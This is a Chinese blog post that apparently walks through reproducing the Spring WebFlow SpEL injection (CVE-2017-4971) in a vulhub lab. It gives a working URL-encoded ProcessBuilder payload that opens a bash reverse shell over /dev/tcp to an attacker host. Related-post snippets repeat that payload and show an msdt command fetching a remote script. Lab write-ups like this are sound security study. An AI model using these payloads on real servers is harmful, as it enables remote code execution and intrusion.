【vulhub】Spring WebFlow 远程代码执行漏洞(CVE-2017-4971)漏洞复现

最新推荐文章于 2023-11-27 11:40:24 发布
最新推荐文章于 2023-11-27 11:40:24 发布
阅读量1.1k 收藏 7
点赞数 1
分类专栏: vulhub 文章标签: spring boot
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45300786/article/details/119298828
版权

漏洞详情

Spring WebFlow 是一个适用于开发基于流程的应用程序的框架(如购物逻辑),可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中,如果我们控制了数据绑定时的field,将导致一个SpEL表达式注入漏洞,最终造成任意命令执行。

影响版本

Spring WebFlow 2.4.0 - 2.4.4

利用条件:可以登录

测试环境

运行测试环境:
靶机: 192.168.100.23 攻击机: 192.168.100.23

docker-compose up -d

然后访问id为1的酒店http://your-ip:8080/hotels/1,点击预订按钮“Book Hotel”,填写相关信息后点击“Process”(从这一步,其实WebFlow就正式开始了):

再点击确认“Confirm”:

此时抓包,抓到一个POST数据包,我们向其中添加一个字段(也就是反弹shell的POC):

_(new java.lang.ProcessBuilder(“bash”,"-c",“bash -i >& /dev/tcp/10.0.0.1/21 0>&1”)).start()=vulhub

(注意:别忘记URL编码)

成功执行,获得shell:
首先访问http://192.168.100.23:8080,点击该登录页面,然后进入登录模块
在这里插入图片描述
会出现很多个默认账号与密码,我们随意挑选一个进行登录操作:
在这里插入图片描述
在这里插入图片描述
然后我们进入这个网址/hotels/1,尽管我并不知道为什么要进入这个网址,但是,应该可以肯定,漏洞的触发点就在这个网址:
在这里插入图片描述
点击这个Book Hotel按钮,然后进行到下一个页面:
随意输入一些合法的内容后,我们点击Proceed然后会跳转到Confirm页面:
在这里插入图片描述
随意输入一些合法的内容后,我们点击Proceed然后会跳转到Confirm页面:
1111111111111111

在这里插入图片描述
在点击Confirm的时候进行抓包,此处存在命令执行,可反弹shell

在这里插入图片描述

使用如下反弹shell的Payload:

&_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/x.x.x.x/10086+0>%261")).start()=vulhub

POST内容增加如下,一定注意这个是有csrf的token的,所以我们重放是没用的,只能在forward的时候改,改完转发

在这里插入图片描述
此处监听10086端口,然后,将IP换为你的远程攻击机IP
在这里插入图片描述

放包后即可获取到shell:成功getshell。
在这里插入图片描述

本来还想写dns验证的,但是他这个exp里没有runtime函数,所以不能反弹。

参考文章:
https://github.com/vulhub/vulhub/tree/master/spring/CVE-2017-4971
https://www.cnblogs.com/cute-puli/p/13363752.html
https://blog.csdn.net/weixin_43736941/article/details/108276870
https://blog.csdn.net/zy15667076526/article/details/111413941

樱浅沐冰
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
spring框架远程代码执行漏洞CVE-2017-4971复现
weixin_43736941的博客
08-28 1895
利用vulhub进行漏洞环境搭建 靶机:centos 172.16.2.182 攻击机:kali 172.16.2.173 浏览器访问172.16.2.182:8080 点击左上角登录,用给出的账号进行登录 点击确定时,burp进行抓包 使用如下反弹shell的Payload: &_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/攻击机IP/端口号+0>%261")).start()=vul
Spring WebFlow 远程代码执行漏洞CVE-2017-4971
qq_53701412的博客
04-30 1675
一、漏洞描述 Spring WebFlow 在 Model 的数据绑定由于没有明确指定相关 model 的具体属性导致从表单可以提交恶意的表达式从而被执行,导致任意代码执行漏洞。 二、影响版本 Spring WebFlow 2.4.0 – 2.4.4 三、利用流程 1选择左侧用户名登陆 2访问路径 `/hotels/1` 点击 `Book Hotel` 3填写相应信息后点击 `Proceed` 4点击 `Confirm` 抓包 ...
CVE-2017-4971-Spring Web Flow RCE漏洞复现
m0_58596609的博客
04-21 2577
CVE-2017-4971-Spring Web Flow RCE漏洞复现
Spring WebFlow 远程代码执行漏洞CVE-2017-4971)——漏洞复现
最新发布
weixin_42090431的博客
11-27 142
(new+java.lang.ProcessBuilder("bash","-c","bash+-i>%26+/dev/tcp/你的IP/21+0>%261")).start()=vulhub。等待环境启动后,访问`http://your-ip:8080`,将看到一个酒店预订的页面,这是spring-webflow官方给的简单示例。
Spring Web Flow远程代码执行漏洞复现(CVE-2017-4971)
wutiangui的博客
09-10 230
1.MvcViewFactoryCreator对象的useSpringBeanBinding参数需要设置为false(默认值)2. flow view对象中设置BinderConfiguration对象为空。影响版本:Spring Web Flow 2.4.0 ~ 2.4.4。将其拼接在csrf后面,记得IP和端口改成自己攻击机的。开启burp抓包,拦截,同时点击confirm。注意出现302时表示重定向了,重新再来就行。点击下面的链接,使用左边默认的账号登录。
Spring Web Flow RCE漏洞复现CVE-2017-4971
Lucky1youzi的博客
01-02 224
渗透
spring Framework 远程命令执行漏洞CVE-2022-22965漏洞脚本自用
10-27
spring Framework 远程命令执行漏洞CVE-2022-22965漏洞脚本自用
CVE-2017-4971 Spring Web Flow 远程代码执行漏洞
精品博客,你值得一看~
09-07 702
当你的应用需要复杂的导航控制,例如向导,在一个比较大的事务过程中去指导用户经过一连串的步骤的时候,SWF将会是一个功能强大的控制器。其中,直接控制field这个值的函数是addDefaultMappings,且未做过滤,而addModelBindings是直接获取的java的一个配置文件,由配置文件来确定是否有 binder 节点,如果有,就无法触发代码执行Spring WebFlow 是一个适用于开发基于流程的应用程序的框架(如购物逻辑),可以将流程的定义和实现流程行为的类和视图分离开来。
Vulhub漏洞靶场搭建
m0_61869253的博客
03-23 587
Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。旨在让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。物理机:Windows 10虚拟机:Centos 7,网卡设置为NAT模式。
vulhub复现Spring Web Flow漏洞(CVE-2017-4971)
m0_70483044的博客
07-14 517
springwebflow是从springframework中分离出来的一个开发模块,是spring模块栈中的一部分。springwevflow的目标是成为管理web应用页面流程的最近方案。当你的应用需要复杂的导航控制,例如向导,在一个比较大的事务过程中去指导用户经过一连串的步骤的时候,SWF将会是一个功能强大的控制器。SpringWebFlow构建于SpringMVC之上,允许实现Web应用程序的“流程”。流程封装了一系列步骤,指导用户执行某些业务任务。httpshttpshttps。.........
XSS,CSRF,SSRF,RCE
qq_41672971的博客
12-10 280
1111111
vulhub漏洞复现43_Nexus
weixin_44193247的博客
02-09 1549
vulhub漏洞复现练习篇
csrf,ssrf,rce,文件包含漏洞,文件上传漏洞
nightswatch1的博客
04-21 3348
21 CSRF与SSRF漏洞 21.1课程大纲 参考链接: 【小迪安全】Day29web漏洞-CSRF及SSRF漏洞案例讲解-哔哩哔哩(bilibili.com) 正在上传…重新上传取消 参考①:cnblogs.com/dogecheng/p/11583412.thml 21.2CSRF...
Vulnhub | DC4靶机 渗透测试
菜鸡一枚
02-28 191
Vulnhub-DC系列第四个靶机,burpsuite爆破登录框、抓包命令执行(RCE)、反弹shell、ssh爆破、teehee提权
vulhub-nexus-cve-2020-10199
Ronin_qianmo的博客
07-28 183
1、漏洞描述 Sonatype Nexus 是一个 Maven 的仓库管理系统,它提供了强大的仓库管理、构件搜索等功能,并且可以用来搭建 Maven 仓库私服,在代理远程仓库的同时维护本地仓库,以节省带宽和时间。 2、登录网址 http://x.x.x.x:8081 3、登录账户 默认登录的用户名和密码是admin/admin123 4、找到漏洞 5、复制当前网页cookie中的CSRF Token6、登录后抓包,获取当前用户的cookie,把cookie中的CSRF Token都替换了7、进入doc
cve-2022-30190 msdt远程代码执行漏洞复现
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞复现过程。 首先,我们需要使用攻击者控制的远程服务器,以便在受影响的目标系统上执行恶意代码。我们创建以下PHP脚本,将其上传到我们的远程服务器上: ``` <?php system('calc.exe'); ?> ``` 这段代码将在目标系统上执行计算器应用程序,然后我们将通过"msdt.exe"命令行工具的特定参数利用该漏洞。 在受影响的目标系统上,我们将打开命令提示符,并执行以下命令: ``` msdt.exe "http://your-remote-server.com/evil-script.php" /id "netwoCpl" /showUI ``` 上述命令将启动"msdt.exe"并使用指定的URL作为参数,同时还指定了"networkCpl"作为"msdt.exe"的标识符。最后,使用"/showUI"参数显示用户界面。 当目标系统执行此命令时,"msdt.exe"会检索远程服务器上的脚本文件,并尝试执行该脚本。由于脚本文件具有恶意代码,它将在目标系统上执行计算器应用程序。 这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以修补此漏洞。还应该维护良好的网络安全措施,以减少被利用的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值